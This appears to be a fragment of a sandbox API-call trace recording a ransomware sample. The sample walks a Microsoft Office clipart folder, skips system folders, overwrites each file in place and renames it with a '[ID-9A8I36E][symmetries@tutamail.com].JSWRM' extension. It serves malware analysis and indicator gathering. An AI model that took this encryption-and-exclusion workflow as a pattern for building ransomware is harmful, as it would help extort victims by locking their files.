lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.810] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20179) returned 1 [0079.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ed0) returned 0x24d210 [0079.810] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ed0, lpOverlapped=0x0) returned 1 [0079.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.813] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ed0, lpOverlapped=0x0) returned 1 [0079.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.813] CloseHandle (hObject=0x314) returned 1 [0079.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0079.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0079.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0079.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0079.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0079.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0079.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0079.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0079.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.815] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27d0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099169.WMF", cAlternateFileName="")) returned 1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2=".") returned 1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="..") returned 1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="...") returned 1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="windows") returned -1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="recovery") returned -1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="perflogs") returned -1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="documents and settings") returned 1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="system volume information") returned -1 [0079.815] lstrcmpiW (lpString1="J0099169.WMF", lpString2="msocache") returned -1 [0079.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099169.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099169.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099169.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099169.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099169.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099169.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.816] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10192) returned 1 [0079.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27d0) returned 0x24d210 [0079.816] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27d0, lpOverlapped=0x0) returned 1 [0079.821] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.821] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27d0, lpOverlapped=0x0) returned 1 [0079.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.821] CloseHandle (hObject=0x314) returned 1 [0079.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0079.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0079.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0079.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0079.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.822] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.823] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5ee4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099170.WMF", cAlternateFileName="")) returned 1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2=".") returned 1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="..") returned 1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="...") returned 1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="windows") returned -1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="recovery") returned -1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="perflogs") returned -1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="documents and settings") returned 1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="system volume information") returned -1 [0079.823] lstrcmpiW (lpString1="J0099170.WMF", lpString2="msocache") returned -1 [0079.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099170.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099170.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099170.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099170.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099170.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099170.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.824] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24292) returned 1 [0079.824] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24d210 [0079.824] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5ee0, lpOverlapped=0x0) returned 1 [0079.827] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.827] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5ee0, lpOverlapped=0x0) returned 1 [0079.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.828] CloseHandle (hObject=0x314) returned 1 [0079.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0079.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0079.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0079.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0079.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.828] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.829] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2232, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099171.WMF", cAlternateFileName="")) returned 1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2=".") returned 1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="..") returned 1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="...") returned 1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="windows") returned -1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="recovery") returned -1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="perflogs") returned -1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="documents and settings") returned 1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="system volume information") returned -1 [0079.829] lstrcmpiW (lpString1="J0099171.WMF", lpString2="msocache") returned -1 [0079.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099171.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099171.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099171.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0079.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099171.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099171.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099171.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0079.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.830] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8754) returned 1 [0079.830] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2230) returned 0x205850 [0079.830] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2230, lpOverlapped=0x0) returned 1 [0079.843] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.843] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2230, lpOverlapped=0x0) returned 1 [0079.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.843] CloseHandle (hObject=0x314) returned 1 [0079.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 